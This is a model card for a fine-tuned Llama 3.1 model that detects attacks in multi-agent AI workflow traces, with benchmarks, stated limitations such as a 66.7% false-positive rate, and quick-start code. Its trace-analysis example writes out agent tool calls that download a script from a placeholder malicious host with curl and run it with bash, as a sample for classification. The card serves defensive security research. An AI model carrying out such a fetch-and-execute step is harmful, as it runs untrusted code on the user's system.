agentic-safety-gguf
Research Paper:(https://arxiv.org/abs/2601.00848)
Specialized security model for detecting temporal attack patterns in multi-agent AI workflows.
Fine-tuned from Foundation-Sec-8B-Instruct (Llama 3.1 8B) on 80,851 curated examples + 141 targeted augmentation examples, achieving 74.29% accuracy on custom cybersecurity benchmarksβa +31.43-point improvement over base model (p < 0.001).
π― Key Capabilities
β
Temporal Attack Pattern Detection: Identifies malicious sequences across multi-step agent workflows
β
OpenTelemetry Trace Analysis: Classifies workflow traces for OWASP Top 10 Agentic vulnerabilities
β
Security Knowledge Q&A: Answers technical questions about agentic AI security, LLM threats, MITRE ATT&CK
β
Multi-Agent Security: Detects coordination attacks in distributed agent systems
β οΈ Critical Production Warning
NOT production-ready for automated security decisions:
- False Positive Rate: 66.7% on benign workflow traces
- Trace Accuracy: 30% overall (60% TPR, 0% TNR)
- Root Cause: Training data heavily skewed toward attacks (90% malicious)
- Deployment: Human-in-the-loop oversight mandatory - suitable for monitoring/alerting only, not automated blocking
See research paper for detailed analysis and proposed V5 improvements.
π Performance Summary
| Benchmark | Base Model | agentic-safety-gguf | Improvement |
|---|---|---|---|
| Custom MCQA Overall | 42.86% | 74.29% | +31.43 pts |
| Agentic AI Security | 40.0% | 70.0% | +30.0 pts |
| Traditional Security | 44.0% | 76.0% | +32.0 pts |
| MMLU Computer Security | - | 74.0% | - |
| MMLU Security Studies | - | 72.24% | - |
Statistical Validation: McNemar's ΟΒ² = 18.05, p < 0.001, Cohen's h = 0.65 (large effect)
Iterative Training: V2 baseline (80,851 ex) β V3 (+111 OWASP) β V4 (+30 adversarial) demonstrated targeted augmentation effectiveness.
π Quick Start
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch
# Load model
model_name = "guerilla7/agentic-safety-gguf"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(
model_name,
torch_dtype=torch.bfloat16,
device_map="auto"
)
# Security Q&A
messages = [
{"role": "system", "content": "You are a cybersecurity expert specialized in agentic workflow security."},
{"role": "user", "content": "What is indirect prompt injection in multi-agent systems?"}
]
inputs = tokenizer.apply_chat_template(messages, return_tensors="pt").to(model.device)
outputs = model.generate(inputs, max_new_tokens=512, temperature=0.7, do_sample=True)
response = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(response)
Analyzing Workflow Traces
import json
trace = {
"spans": [
{"name": "user_request", "attributes": {"action": "fetch_emails"}},
{"name": "tool_call", "attributes": {"tool": "curl", "url": "https://malicious.com/script.sh"}},
{"name": "tool_call", "attributes": {"tool": "bash", "command": "script.sh"}}
]
}
prompt = f"""Analyze this trace for security threats:
{json.dumps(trace, indent=2)}
Classify as BENIGN, SUSPICIOUS, or MALICIOUS."""
# Use model as above with prompt
β οΈ Warning: 66.7% FPR requires human review before taking action.
π Use Cases
β Recommended
- Security research on agentic AI vulnerabilities
- Educational demonstrations (OWASP Top 10)
- Prototype development for security tools
- Knowledge assistance (74% MCQA accuracy)
β Not Recommended
- Production security monitoring without human oversight
- Automated security decisions (30% trace accuracy insufficient)
- Mission-critical applications
- Regulatory compliance automation
π Training Details
Dataset: 80,851 curated examples from 18 cybersecurity sources + 35,026 synthetic OpenTelemetry traces, augmented with 111 OWASP-focused + 30 adversarial examples via continuation training
Complete dataset: guerilla7/agentic-safety-gguf
Method: QLoRA (4-bit NF4, rank 16, alpha 16)
Hardware: NVIDIA DGX Spark (ARM64, 128GB)
Training: V2 (1,500 steps, 6h 43m) β V3 (+500 steps) β V4 (+500 steps)
Loss: 3.68 β 0.52 (85.99% reduction)
See research paper for the complete methodology, ablation studies, and statistical analysis.
π Resources
- Dataset Repository: datasets/guerilla7/agentic-safety-gguf
- Research Paper: (https://arxiv.org/abs/2601.00848)
- Training Scripts: Complete QLoRA implementation, evaluation code, GGUF quantization utilities
π Citation
@article{agentic-safety-gguf-2025,
title={agentic-safety-gguf: Specialized Fine-Tuning for Agentic AI Security},
year={2025},
url={https://huggingface.co/guerilla7/agentic-safety-gguf}
}
βοΈ Limitations
- High False Positive Rate (66.7%): Unsuitable for production without human oversight
- Small Evaluation Sample: 30 trace evaluation (Β±18% confidence intervals)
- Synthetic Data Bias: 43% synthetic training data
- ARM64-Specific: Training validated on DGX Spark only
- No Commercial Comparison: Not benchmarked against GPT-4/Claude
Proposed V5 Solution: Balanced dataset (80K benign + 80K malicious) targeting 30-50% FPR, 75-85% TPR. See paper for detailed roadmap.
π Updates
- 2025-12-29: Initial release with V2/V3/V4 training artifacts and research paper
License
Apache 2.0
- Downloads last month
- 117
4-bit
Model tree for guerilla7/agentic-safety-gguf
Base model
meta-llama/Llama-3.1-8BPaper for guerilla7/agentic-safety-gguf
Evaluation results
- Overall Accuracyself-reported74.290
- Agentic AI Securityself-reported70.000